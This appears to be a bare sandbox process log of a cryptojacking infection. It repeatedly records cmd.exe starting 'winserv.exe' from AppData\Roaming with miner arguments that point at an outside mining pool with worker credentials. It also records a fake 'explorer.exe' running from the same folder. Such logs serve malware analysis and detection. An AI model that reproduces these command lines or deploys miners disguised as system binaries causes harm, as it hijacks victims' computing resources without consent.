cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
